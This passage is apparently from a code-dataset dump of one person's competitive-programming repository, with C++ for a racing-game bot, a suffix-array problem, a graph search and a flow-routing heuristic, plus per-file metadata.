1) - height - bonus.getWidth() / 2 - 78);\n nextWaypointX = max(nextWaypointX, get(bbb.first) + height + bonus.getWidth() / 2 + 78);\n nextWaypointY = min(nextWaypointY, get(bbb.second + 1) - height - bonus.getHeight() / 2 - 78);\n nextWaypointY = max(nextWaypointY, get(bbb.second) + height + bonus.getHeight() / 2 + 78);\n }\n if (is32(path))\n tie(nextWaypointX, nextWaypointY) = make_pair(getCenter(path[2].first), getCenter(path[2].second));\n\n auto cars = world.getCars();\n sort(cars.begin(), cars.end(), [&self](const Car& aaa, const Car& bbb) { return self.getDistanceTo(aaa) < self.getDistanceTo(bbb);});\n for (Car car : world.getCars())\n if (!car.isFinishedTrack())\n if ((car.getDurability() == 0 || hypot(car.getSpeedX(), car.getSpeedY()) * 1.05 < speedModule || fabs(car.getAngleTo(self)) < PI / 2 || speedModule < 10) && world.getTick() > 300)\n {\n pair<int, int> ccc = {car.getX() / tileSize, car.getY() / tileSize};\n pair<int, int> qwerty = {ti, tj};\n int index = 0;\n for (auto point : path)\n {\n if (point == qwerty)\n break;\n if (point == ccc && index + 1 < int(path.size()) && (self.getDistanceTo(car) > tileSize || speedModule < 10))\n {\n if (isHorizontal(point, path[index + 1]))\n {\n if (targetX <= self.getX() && self.getX() <= car.getX() || targetX >= self.getX() && self.getX() >= car.getX())\n continue;\n double lower = get(ccc.second) + 80 + height + 15;\n double lower2 = car.getY() - height - 15 - car.getWidth();\n double upper = get(ccc.second + 1) - 80 - height - 15;\n double upper2 = car.getY() + height + 15 + car.getWidth();\n double cgy = car.getY();\n double dist1 = self.getDistanceTo(car.getX(), lower) + hypot(nextWaypointX - car.getX(), nextWaypointY - lower);\n double dist2 = self.getDistanceTo(car.getX(), lower2) + hypot(nextWaypointX - car.getX(), nextWaypointY - lower2);\n double dist3 = self.getDistanceTo(car.getX(), upper) + hypot(nextWaypointX - car.getX(), nextWaypointY - upper);\n double dist4 = self.getDistanceTo(car.getX(), upper2) + hypot(nextWaypointX - car.getX(), nextWaypointY - upper2);\n nextWaypointX = car.getX();\n nextWaypointY = (cgy - lower > upper - cgy) ? (dist1 < dist2 ? lower : lower2) : (dist3 < dist4 ? upper : upper2);\n }\n if (isVertical(point, path[index + 1]))\n {\n if (targetY <= self.getY() && self.getY() <= car.getY() || targetY >= self.getY() && self.getY() >= car.getY())\n continue;\n double lower = get(ccc.first) + 80 + height + 15;\n double lower2 = car.getX() - height - 15 - car.getWidth();\n double upper = get(ccc.first + 1) - 80 - height - 15;\n double upper2 = car.getX() + height + 15 + car.getWidth();\n double cgy = car.getX();\n double dist1 = self.getDistanceTo(car.getY(), lower) + hypot(nextWaypointY - car.getY(), nextWaypointX - lower);\n double dist2 = self.getDistanceTo(car.getY(), lower2) + hypot(nextWaypointY - car.getY(), nextWaypointX - lower2);\n double dist3 = self.getDistanceTo(car.getY(), upper) + hypot(nextWaypointY - car.getY(), nextWaypointX - upper);\n double dist4 = self.getDistanceTo(car.getY(), upper2) + hypot(nextWaypointY - car.getY(), nextWaypointX - upper2);\n nextWaypointY = car.getY();\n nextWaypointX = (cgy - lower > upper - cgy) ? (dist1 < dist2 ? lower : lower2) : (dist3 < dist4 ? upper : upper2);\n }\n break;\n }\n ++index;\n }\n\n }\n auto os = world.getOilSlicks();\n sort(os.begin(), os.end(), [&self](const OilSlick& aaa, const OilSlick& bbb) { return self.getDistanceTo(aaa) < self.getDistanceTo(bbb);});\n for (auto o : os)\n {\n pair<int, int> ccc = {o.getX() / tileSize, o.getY() / tileSize};\n pair<int, int> qwerty = {ti, tj};\n int index = 0;\n for (auto point : path)\n {\n if (point == qwerty)\n break;\n if (point == ccc && index + 1 < int(path.size()) && self.getDistanceTo(o) > tileSize && self.getDistanceTo(o) < self.getDistanceTo(nextWaypointX, nextWaypointY))\n {\n if (isHorizontal(point, path[index + 1]))\n {\n if (targetX <= self.getX() && self.getX() <= o.getX() || targetX >= self.getX() && self.getX() >= o.getX())\n continue;\n double lower = get(ccc.second) + 80 + height + 15;\n double lower2 = o.getY() - height - 15 - o.getRadius();\n double upper = get(ccc.second + 1) - 80 - height - 15;\n double upper2 = o.getY() + height + 15 + o.getRadius();\n double cgy = o.getY();\n double dist1 = self.getDistanceTo(o.getX(), lower) + hypot(nextWaypointX - o.getX(), nextWaypointY - lower);\n double dist2 = self.getDistanceTo(o.getX(), lower2) + hypot(nextWaypointX - o.getX(), nextWaypointY - lower2);\n double dist3 = self.getDistanceTo(o.getX(), upper) + hypot(nextWaypointX - o.getX(), nextWaypointY - upper);\n double dist4 = self.getDistanceTo(o.getX(), upper2) + hypot(nextWaypointX - o.getX(), nextWaypointY - upper2);\n nextWaypointX = o.getX();\n nextWaypointY = (cgy - lower > upper - cgy) ? (dist1 < dist2 ? lower : lower2) : (dist3 < dist4 ? upper : upper2);\n }\n if (isVertical(point, path[index + 1]))\n {\n if (targetY <= self.getY() && self.getY() <= o.getY() || targetY >= self.getY() && self.getY() >= o.getY())\n continue;\n double lower = get(ccc.first) + 80 + height + 15;\n double lower2 = o.getX() - height - 15 - o.getRadius();\n double upper = get(ccc.first + 1) - 80 - height - 15;\n double upper2 = o.getX() + height + 15 + o.getRadius();\n double cgy = o.getX();\n double dist1 = self.getDistanceTo(o.getY(), lower) + hypot(nextWaypointY - o.getY(), nextWaypointX - lower);\n double dist2 = self.getDistanceTo(o.getY(), lower2) + hypot(nextWaypointY - o.getY(), nextWaypointX - lower2);\n double dist3 = self.getDistanceTo(o.getY(), upper) + hypot(nextWaypointY - o.getY(), nextWaypointX - upper);\n double dist4 = self.getDistanceTo(o.getY(), upper2) + hypot(nextWaypointY - o.getY(), nextWaypointX - upper2);\n nextWaypointY = o.getY();\n nextWaypointX = (cgy - lower > upper - cgy) ? (dist1 < dist2 ? lower : lower2) : (dist3 < dist4 ? upper : upper2);\n }\n break;\n }\n ++index;\n }\n\n }\n double angleToWaypoint = self.getAngleTo(nextWaypointX, nextWaypointY);\n //double check = self.getAngleTo(getCenter(ti), getCenter(tj));\n //if ((fabs(check - PI) < PI / 6 || fabs(check + PI) < PI / 6) && planB == 0 && forceRight == 0 && forceBack == 0)\n //planB = PLANB,\n //power *= -1;\n //if (fabs(check) < PI / 3 && planB && forceRight == 0 && forceBack == 0)\n //power *= -1,\n //planB = 0;\n auto getTurn = [&](double dod)\n {\n return angleToWaypoint * dod * pow(DIST_TO_NEXT / distToNext, 0.8) / PI;\n };\n bool okSnake = false;\n int count = 0;\n if (snake && path.size() >= 3)\n {\n vector<int> fff = {\n directions[make_pair(path[0].first - path[1].first, path[0].second - path[1].second)],\n directions[make_pair(path[1].first - path[2].first, path[1].second - path[2].second)]\n };\n for (int i = 2; i + 1 < path.size(); ++i)\n if (directions[make_pair(path[i].first - path[i + 1].first, path[i].second - path[i + 1].second)] == fff[i % 2])\n count++;\n else\n break;\n\n okSnake = count >= 9;\n }\n if (forceBack)\n {\n forceBack--;\n if (forceBack == 0)\n {\n power *= -1;\n forceRight = FORCE_RIGHT;\n turn *= -1;\n }\n }\n\n else if (forceRight)\n {\n if (forceRight > FORCE_RIGHT - BREAK)\n move.setBrake(true);\n forceRight--;\n if (forceRight == 0 || planB)\n planB = 0;\n }\n if (forceBack == 0 && forceRight == 0)\n {\n if (changed && fabs(prevDistance - distToNext) < eps)\n {\n countOfFails++;\n {\n if (countOfFails > COUNT_OF_FAILS)\n {\n globalFail++;\n countOfFails = 0;\n forceBack = FORCE_BACK;\n turn = getTurn(32);\n if (isCorner(a[si][sj]))\n {\n turn = turn > 0 ? 1 : -1;\n if (globalFail > GLOBAL_FAIL)\n turn *= -1;\n }\n else\n if (globalFail > GLOBAL_FAIL)\n turn = turn > 0 ? 1 : -1;\n turn *= -1;\n power *= -1;\n }\n }\n }\n else\n {\n if (force)\n force--;\n forceSlow = path.size() <= 4 ? 14 : 100;\n if (world.getTick() <= tickTarget + 200)\n forceSlow = badMap * 20;\n if (is4(path))\n forceSlow *= 1.5;\n countOfFails = 0;\n globalFail = 0;\n\n if (forceRight == 0)\n turn = getTurn(36);\n double dd = speedModule / MAX_SPEED;\n //if (is32(path))\n //dd *= 1.3;\n if (is3_2(path))\n dd /= 2;\n if (is212(path))\n dd /= 2;\n if (is41(path))\n dd *= 1.2;\n bool fas = is131(path) && speedModule > 16.5 || world.getMapName() == \"map14\" && speedModule > 18 && count < 3;\n\n if ((!snake && distToNext < tileSize * dd && distToNext > tileSize && bad.find(S) == bad.end()) || speedModule > forceSlow || (bad.find(S) != bad.end() && speedModule > 11.5) || fas)\n move.setBrake(true);\n }\n }\n if (forceRight == 0 && forceBack == 0 && planB)\n {\n if (angleToWaypoint > 0)\n angleToWaypoint = PI - angleToWaypoint;\n else\n angleToWaypoint = -PI + angleToWaypoint;\n turn = getTurn(32);\n\n }\n move.setWheelTurn(turn);\n move.setEnginePower(power);\n for (auto car : world.getCars())\n if (!car.isTeammate())\n {\n if (world.getTick() > 250 && self.getDistanceTo(car) <= tileSize * 2)\n {\n if (fabs(self.getAngleTo(car)) < ANGLE_THROW / 2 && !car.isFinishedTrack() && (hypot(car.getSpeedX(), car.getSpeedY()) < 5 || fabs(car.getAngle() - self.getAngle()) < PI / 60 || self.getDistanceTo(car) < tileSize))\n move.setThrowProjectile(true);\n }\n if (self.getDistanceTo(car) <= tileSize * 6 && isCorner(a[wx][wy]) && planB == 0)\n move.setSpillOil(true);\n }\n\n if (forceRight == 0 && forceBack == 0 && world.getTick() > beforeTick && (distToNext > tileSize * 5 || (okSnake && bad.find(S) == bad.end() && speedModule > 20)) && planB == 0 && fabs(angleToWaypoint) < PI / 90)\n move.setUseNitro(true);\n if (ct == BUGGY)\n return;\n#ifdef vis\n visual.beginPre();\n auto vvv = world.getTilesXY();\n for (int i = 0; i < vvv.size(); ++i)\n for (int j = 0; j < vvv[0].size(); ++j)\n if (vvv[i][j] == UNKNOWN)\n visual.fillRect(get(i), get(j), get(i + 1), get(j + 1), 0xBB0000);\n auto HSVtoRgb = [](double H, double S, double V)\n {\n double f, p, q, t;\n S = (S > 1) ? S / 100 : S;\n V = (V > 1) ? V / 100 : V;\n int lH = int(H / 60);\n f = H / 60 - lH;\n p = V * (1 - S);\n q = V * (1 - S * f);\n t = 1 - (1 - f) * S;\n double R, G, B;\n \n switch (lH)\n {\n case 0: R = V; G = t; B = p; break;\n case 1: R = q; G = V; B = p; break;\n case 2: R = p; G = V; B = t; break;\n case 3: R = p; G = q; B = V; break;\n case 4: R = t; G = p; B = V; break;\n case 5: R = V; G = p; B = q; break;\n }\n int r = R * 0xFF;\n int g = G * 0xFF;\n int b = B * 0xFF;\n return r << 16 | g << 8 | b;\n };\n\n int index = 0;\n auto sdjkflghsldkfj = world.getWaypoints();\n for (auto p : sdjkflghsldkfj)\n visual.fillRect(get(p[0]), get(p[1]), get(p[0] + 1), get(p[1] + 1), HSVtoRgb(index++ * 360 / sdjkflghsldkfj.size(), 1, 1));\n\n visual.fillCircle(getCenter(ti), getCenter(tj), 400, 0x54618f);\n visual.line(self.getX(), self.getY(), nextWaypointX, nextWaypointY);\n char sss[45];\n sprintf(sss, \"%d %d s:%.2f a:%.2f t:%.2f\", pd, d, speedModule, angleToWaypoint, turn);\n visual.text(self.getX() + 120, self.getY() + 120, sss);\n sss[44] = 0;\n for (int i = 1; i < min(15, int(path.size())); ++i)\n visual.line(getCenter(path[i - 1].first), getCenter(path[i - 1].second), getCenter(path[i].first), getCenter(path[i].second), 0xff0000);\n visual.line(getCenter(pi), getCenter(pj), getCenter(ti), getCenter(tj), 0x00ff00);\n visual.line(getCenter(ti), getCenter(tj), getCenter(fi), getCenter(fj), 0x00ff00);\n visual.endPre();\n visual.beginPost();\n visual.endPost();\n#endif\n }\n}\n\nMyStrategy::MyStrategy() \n{\n#undef bad\n#undef old\n#undef once\n bad.resize(2);\n old.resize(2);\n once.resize(2);\n directions[make_pair(1, 0)] = RIGHT;\n directions[make_pair(-1, 0)] = LEFT;\n directions[make_pair(0, 1)] = DOWN;\n directions[make_pair(0, -1)] = UP;\n#define rht RIGHT_HEADED_T\n#define lht LEFT_HEADED_T\n#define tht TOP_HEADED_T \n#define bht BOTTOM_HEADED_T\n#define cr CROSSROADS\n dir[VERTICAL][UP] = dir[VERTICAL][DOWN] = true;\n dir[HORIZONTAL][LEFT] = dir[HORIZONTAL][RIGHT] = true;\n\n dir[LEFT_TOP_CORNER][RIGHT] = dir[LEFT_TOP_CORNER][DOWN] = true;\n dir[RIGHT_TOP_CORNER][LEFT] = dir[RIGHT_TOP_CORNER][DOWN] = true;\n dir[LEFT_BOTTOM_CORNER][RIGHT] = dir[LEFT_BOTTOM_CORNER][UP] = true;\n dir[RIGHT_BOTTOM_CORNER][LEFT] = dir[RIGHT_BOTTOM_CORNER][UP] = true;\n\n dir[rht][UP] = dir[rht][DOWN] = dir[rht][RIGHT] = true;\n dir[lht][DOWN] = dir[lht][UP] = dir[lht][LEFT] = true;\n dir[bht][DOWN] = dir[bht][LEFT] = dir[bht][RIGHT] = true;\n dir[tht][UP] = dir[tht][LEFT] = dir[tht][RIGHT] = true;\n\n dir[cr][DOWN] = dir[cr][UP] = dir[cr][LEFT] = dir[cr][RIGHT] = true;\n freopen(\"lol\", \"w\", stdout);\n#ifdef debug\n writeln(FUUUUU);\n#endif\n}\n" }, { "alpha_fraction": 0.37383177876472473, "alphanum_fraction": 0.39307311177253723, "avg_line_length": 19.438201904296875, "blob_id": "71a009ad3491d23c3076a3a34343c8aa69f66aba", "content_id": "699037bb6b951a6a3f97cc703e858b870df80699", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1819, "license_type": "no_license", "max_line_length": 88, "num_lines": 89, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.09.23/J.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdio>\n#include <iostream>\n#include <algorithm>\n#include <cstring>\n\nusing namespace std;\n\n#define REP(i, n) for (int i = 0; i < (int)(n); ++i)\n\nconst int MAXN = 500002;\nstring s;\nint n, gap;\nint sa[MAXN], pos[MAXN], tmp[MAXN], lcp[MAXN];\n\nbool sufCmp(int i, int j)\n{\n if (pos[i] != pos[j])\n return pos[i] < pos[j];\n i += gap;\n j += gap;\n return (i < n && j < n) ? pos[i] < pos[j] : i > j;\n}\n\nvoid buildsA()\n{\n n = s.size();\n// s.push_back('!');\n REP(i, n)\n sa[i] = i,\n pos[i] = s[i];\n for (gap = 1;; gap *= 2)\n {\n sort(sa, sa + n, sufCmp);\n REP(i, n - 1)\n tmp[i + 1] = tmp[i] + sufCmp(sa[i], sa[i + 1]);\n REP(i, n)\n pos[sa[i]] = tmp[i];\n if (tmp[n - 1] == n - 1)\n break;\n }\n}\n\nvoid buildLCP()\n{\n for (int i = 0, k = 0; i < n; ++i)\n if (pos[i] != n - 1)\n {\n for (int j = sa[pos[i] + 1]; max(i + k, j + k) < n && s[i + k] == s[j + k];)\n ++k;\n lcp[pos[i]] = k;\n if (k)\n --k;\n }\n}\n\nint main()\n{\n //freopen(\"input.in\", \"r\", stdin);\n int z;\n std::cin >> z;\n if (z == 1)\n {\n printf(\"0\");\n return 0;\n }\n std::cin >> s;\n int countP = 0, countL = 0, posP = -1, posL = -1;\n REP(i, s.size())\n s[i] == 'L' ? countL++, posL = i : (countP++, posP = i);\n buildsA();\n buildLCP();\n int pos[MAXN];\n REP(i, n)\n pos[sa[i]] = i;\n int ans[MAXN];\n REP(i, n - 1)\n if (pos[i] == 0)\n ans[i] = lcp[pos[i]];\n else\n ans[i] = max(lcp[pos[i]], lcp[pos[i] - 1]);\n ans[n - 1] = 1;\n if (countL == 1)\n ans[posL] = 0;\n if (countP == 1)\n ans[posP] = 0;\n REP(i, n)\n printf(\"%d\\n\", ans[i]);\n return 0;\n}\n" }, { "alpha_fraction": 0.3828032910823822, "alphanum_fraction": 0.40812721848487854, "avg_line_length": 17.866666793823242, "blob_id": "3aa58f336230ff46e71945581be67e2d05bd0315", "content_id": "f0cfc797b2be513203c64c609cd0fc0c6e9f199a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1698, "license_type": "no_license", "max_line_length": 57, "num_lines": 90, "path": "/trash/typycal_proger/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stack>\n#include <vector>\n#include <stdio.h>\n#include <queue>\n#include <set>\n#include <ctime>\n\nusing namespace std;\nvector< vector<int> > edges;\nbool vertex[502][502];\nbool edge[502][502];\nvector<int> ss;\nint n, m;\n\n\nvoid dfs(int v, int d)\n{\n if (v == n - 1 || ss[d] < v)\n throw 1;\n if (clock()*100000/CLOCKS_PER_SEC >= 1900)\n {\n throw 0;\n }\n for (int i = 0; i < edges[v].size(); i++)\n {\n int u = edges[v][i];\n if (!vertex[u][d + 1] && (i != 0 || !edge[v][d]))\n dfs(u, d + 1); else\n continue;\n }\n}\n\nint main()\n{\n // freopen(\"input.txt\", \"r\", stdin);\n //freopen(\"output.out\", \"w+\", stdout);\n int q;\n scanf(\"%d %d\\n%d\\n\", &n, &m, &q);\n char c;\n edges.resize(n + 1);\n vertex[q][0] = true;\n if (q == 0)\n {\n printf(\"NO\\n\");\n return 0;\n }\n ss.push_back(q);\n for (int i = 0; i < n; i++)\n {\n if (i != n - 1)\n edges[i].push_back(i + 1);\n scanf(\"%c\", &c);\n if (c == 'L')\n {\n q--;\n edge[q][i] = true;\n } else\n {\n edge[q][i] = true;\n q++;\n }\n ss.push_back(q);\n vertex[q][i + 1] = true;\n }\n int x, y;\n for (int i = 0; i < m; i++)\n {\n scanf(\"%d %d\\n\", &x ,&y);\n if (x < y)\n edges[x].push_back(y); else\n edges[y].push_back(x);\n }\n try\n {\n dfs(0, 0);\n }\n catch(int e)\n {\n if (e == 1)\n printf(\"YES\\n\"); else\n printf(\"NO\\n\");\n return 0;\n }\n // fclose(stdin);\n // fclose(stdout);\n printf(\"NO\\n\");\n return 0;\n}\n" }, { "alpha_fraction": 0.4525647759437561, "alphanum_fraction": 0.46586036682128906, "avg_line_length": 26.495283126831055, "blob_id": "d6593161d3601cade5e927dfd56b0db787cf5a4f", "content_id": "8c45ebc00c573f4c681b570f45beaa389ef72190", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 11658, "license_type": "no_license", "max_line_length": 174, "num_lines": 424, "path": "/CodeForce/1576/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#ifdef ONLINE_JUDGE\n#pragma GCC optimize(\"Ofast\")\n#endif\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//rng\nmt19937 rng(chrono::steady_clock::now().time_since_epoch().count());\n\n//}}}\n\n[[maybe_unused]] const int GFL = 100;\n[[maybe_unused]] const int NFL = 200;\n\nstruct edge // {{{\n{\n int id;\n int g;\n int from;\n int to;\n int d;\n int c;\n int now = 0;\n\n int getTo(int u) const\n {\n return from ^ to ^ u;\n }\n\n edge() {}\n\n friend istream& operator>>(istream& in, edge& e) {\n return in >> e.id >> e.g >> e.from >> e.to >> e.d >> e.c;\n }\n \n friend ostream& operator<<(ostream& out, const edge& e) {\n return out << \"Edge: \" << e.id << \", g \" << e.g << \", from \" << e.from << \", to \" << e.to << \", d \" << e.d << \", c \" << e.c << \", now \" << e.now;\n }\n};\n\nstruct node\n{\n int id;\n vector<int> out;\n unordered_set<int> restrictions;\n int now = 0;\n\n node() {}\n\n void addRestriction(int fromEdge, int toEdge)\n {\n restrictions.insert(getHash(fromEdge, toEdge));\n }\n\n int getHash(int fromEdge, int toEdge) const\n {\n return (min(fromEdge, toEdge) << 16) + max(fromEdge, toEdge);\n }\n\n bool can(int fromEdge, int toEdge) const \n {\n if (fromEdge == -1 || toEdge == -1) return true;\n return restrictions.count(getHash(fromEdge, toEdge)) == 0;\n }\n\n friend ostream& operator<<(ostream& out, const node& e) {\n return out << \"Node \" << e.id << \", out \" << e.out.size() << \", restrictions \" << e.restrictions.size() << \", now \" << e.now;\n }\n\n};\n\nstruct flow\n{\n int id;\n int from;\n int to;\n int r;\n vector<int> path;\n\n flow() {}\n\n friend istream& operator>>(istream& in, flow& e) {\n return in >> e.id >> e.from >> e.to >> e.r;\n }\n \n friend ostream& operator<<(ostream& out, const flow& e) {\n return out << \"Flow \" << e.id << \", from \" << e.from << \", to \" << e.to << \", rate \" << e.r;\n }\n\n}; // }}}\n\nint n, m, c, F, g = 4500, TREES = 1;\n\nvector<edge> edges; // {{{\nvector<flow> flows;\nvector<int> groups;\nvector<node> nodes;\nunordered_set<int> ggg;\nvector<int> nnn;\n\nbool checkCannotUseEdge(int u, int v, int fromEdge, const int& rate, const edge& e) {\n return e.now + rate > e.c || !nodes[u].can(e.id, fromEdge) || groups[e.g] == GFL || nodes[v].now == NFL;\n};\n\nstruct tree\n{\n vector<int> d;\n vector<pii> p;\n vector<bool> used;\n int root;\n int c = 12000;\n int fails = 0;\n int to = -1;\n\n tree()\n {\n d.resize(n, MOD);\n p.resize(n, {-1, -1});\n used.resize(n, false);\n }\n\n tree(int root, int c, int to) : root(abs(root) % n), to(to)\n {\n c = abs(c) % 12001;\n this->c = c;\n d.resize(n, MOD);\n p.resize(n, {-1, -1});\n used.resize(n, false);\n bfs(this->root, this->c, this->to);\n }\n\n void reset(int root, int c = 0, int to = -1)\n {\n fails = 0;\n if (!c)\n c = abs(int(rng())) % 12001;\n this->c = c;\n\n fori(n)\n d[i] = MOD,\n p[i] = {-1, -1},\n used[i] = false;\n this->root = abs(root) % n;\n this->to = to;\n bfs(this->root, this->c, this->to);\n }\n\n void bfs(int root, int rate, int to = -1)\n {\n queue<tuple<int, int, int>> s;\n d[root] = 0;\n s.push({0, root, -1});\n while (s.size())\n {\n auto [_, u, fromEdge] = s.front();\n s.pop();\n if (u == to) break;\n used[u] = true;\n for (const int& eid: nodes[u].out)\n {\n const auto& e = edges[eid];\n int v = e.getTo(u);\n if (used[v] || checkCannotUseEdge(u, v, fromEdge, rate, e))\n continue;\n int cur = d[u] + 1;\n if (cur < d[v])\n {\n d[v] = cur;\n p[v] = {u, e.id};\n s.push({d[v], v, e.id});\n }\n }\n }\n }\n\n vector<int> getPath(int from, int to)\n {\n if (nodes[from].now == NFL) return vector<int>();\n if (nodes[to].now == NFL) return vector<int>();\n if (d[from] == MOD) return vector<int>();\n if (d[to] == MOD) return vector<int>();\n\n vector<int> p1, p2;\n auto add = [&](vector<int>& path, int& u) {\n path.pb(p[u].second);\n u = p[u].first;\n };\n while (d[from] > d[to]) add(p1, from);\n while (d[from] < d[to]) add(p2, to);\n while (d[from] && from != to)\n {\n add(p1, from);\n add(p2, to);\n }\n reverse(all(p2));\n copy(all(p2), back_inserter(p1));\n return p1;\n }\n\n bool addPath(flow& f)\n {\n bool ok = addPathImpl(f);\n fails += !ok;\n if (fails >= 10)\n reset(root);\n return ok;\n }\n\n bool addPathImpl(flow& f)\n {\n vector<int> path = getPath(f.from, f.to);\n if (!path.size()) return false;\n\n ggg.clear();\n nnn.clear();\n\n int u = f.from;\n int fromEdge = -1;\n for (int& eid: path)\n {\n edge& e = edges[eid];\n int v = e.getTo(u);\n if (checkCannotUseEdge(u, v, fromEdge, f.r, e))\n return false;\n nnn.pb(u);\n ggg.insert(e.g);\n u = v;\n fromEdge = eid;\n }\n\n u = f.from;\n for (int& eid: path)\n {\n edge& e = edges[eid];\n e.now += f.r;\n u = e.getTo(u);\n }\n for (int gg: ggg)\n groups[gg]++;\n\n nodes[u].now++;\n for (int nn: nnn)\n nodes[nn].now++;\n f.path = path;\n return true;\n }\n\n friend ostream& operator<<(ostream& out, const tree& t)\n {\n out << \"Tree: root \" << t.root << \", d =\";\n for (int x: t.d)\n out << \" \" << x;\n return out;\n }\n}; // }}}\n\nvoid run()\n{\n double time = clock(); // {{{\n readln(n, m, c, F);\n nodes.resize(n);\n edges.resize(m);\n groups.resize(g + 1);\n flows.resize(F);\n fori(n) nodes[i].id = i;\n\n { //READ INPUT\n readln(edges);\n for (const auto& e: edges)\n nodes[e.from].out.pb(e.id),\n nodes[e.to].out.pb(e.id);\n forn(q, c)\n {\n ints(id, u, v);\n nodes[id].addRestriction(u, v);\n }\n readln(flows);\n fori(n)\n shuffle(all(nodes[i].out), rng);\n //sort(all(nodes[i].out), [&](int a, int b) {\n //return edges[a].c > edges[b].c;\n //});\n } // }}}\n\n tree t(0, 0, -1);\n shuffle(all(flows), rng);\n //sort(all(flows), [&](const flow& a, const flow& b) {\n //return tuple(t.d[a.from], a.r) < tuple(t.d[b.from], b.r);\n //return tuple(a.from, a.to) < tuple(b.from, b.to);\n //});\n vector<tree> trees(1);\n //fori(TREES)\n //trees.pb(tree(0, flows[0].r * 3));\n\n fori(F)\n {\n auto& f = flows[i];\n if (1000.0 * (clock() - time) / CLOCKS_PER_SEC > 1950)\n break;\n //if (++i % 100 == 99)\n //cerr << i << \"/\" << F << endl;\n if (!i || flows[i - 1].from != f.from)\n trees[0].reset(f.from, f.r, f.to);\n trees[0].addPath(f);\n continue;\n const int MXQ = 2;\n forn(q, MXQ)\n {\n bool found = false;\n forj(TREES)\n if (trees[j].addPath(f))\n {\n found = true;\n break;\n }\n if (found) break;\n if (!found && q + 1 != MXQ)\n forj(TREES)\n trees[j].reset(f.from, f.r * (MXQ - q - 1));\n }\n }\n\n int ans = 0;\n { //PRINT ANSWER\n for (const auto& f: flows) ans += f.path.size() != 0;\n writeln(ans);\n for (const auto& f: flows) if (f.path.size()) writeln(f.id, f.path);\n }\n\n#ifndef ONLINE_JUDGE //{{{\n {\n vector<int> E(m);\n vector<int> N(n);\n vector<set<int>> G(g + 1);\n for (const auto& f: flows)\n {\n if (!f.path.size()) continue;\n set<int> nodesPerPath;\n set<int> edgesPerPath;\n int u = f.from;\n\n for (auto& eid: f.path)\n {\n auto e = edges[eid];\n E[eid] += f.r;\n N[u]++;\n if (!nodesPerPath.insert(u).second)\n writeln(\"NODE\", u, \"ALREADY EXISTS IN FLOW\", f.id);\n G[e.g].insert(f.id);\n if (!edgesPerPath.insert(eid).second)\n writeln(\"EDGE\", eid, \"ALREADY EXISTS IN FLOW\", f.id);\n u = e.getTo(u);\n }\n if (!nodesPerPath.insert(u).second)\n writeln(\"NODE\", u, \"ALREADY EXISTS IN FLOW\", f.id);\n if (u != f.to)\n writeln(\"END IN WRONG NODE\", f.to, \"EXPECTED\", u, \"FOUND\");\n N[u]++;\n }\n fori(m)\n if (E[i] > edges[i].c)\n writeln(\"ERROR EDGE CAPACITY\", i, \"EXPECTED\", edges[i].c, \"FOUND\", E[i]);\n fori(n)\n if (N[i] > NFL)\n writeln(\"ERROR NODE FLOW LIMIT\", i, \"EXPECTED\", NFL, \"FOUND\", N[i]);\n fori(g + 1)\n if (G[i].size() > GFL)\n writeln(\"ERROR GROUP FLOW LIMIT\", i, \"EXPECTED\", GFL, \"FOUND\", G[i].size());\n\n cerr << ans << endl;\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n }\n#endif //}}}\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.4898989796638489, "alphanum_fraction": 0.5050504803657532, "avg_line_length": 14.15384578704834, "blob_id": "e27722b3b5b29742e2207ecc98412981af7b5877", "content_id": "29f0725b58a63b336fc328ee85b5e909168ee601", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 198, "license_type": "no_license", "max_line_length": 61, "num_lines": 13, "path": "/2021/yandexAlgoQual/A.py", "repo_name": "Igorjan94/CF", "src_encoding": 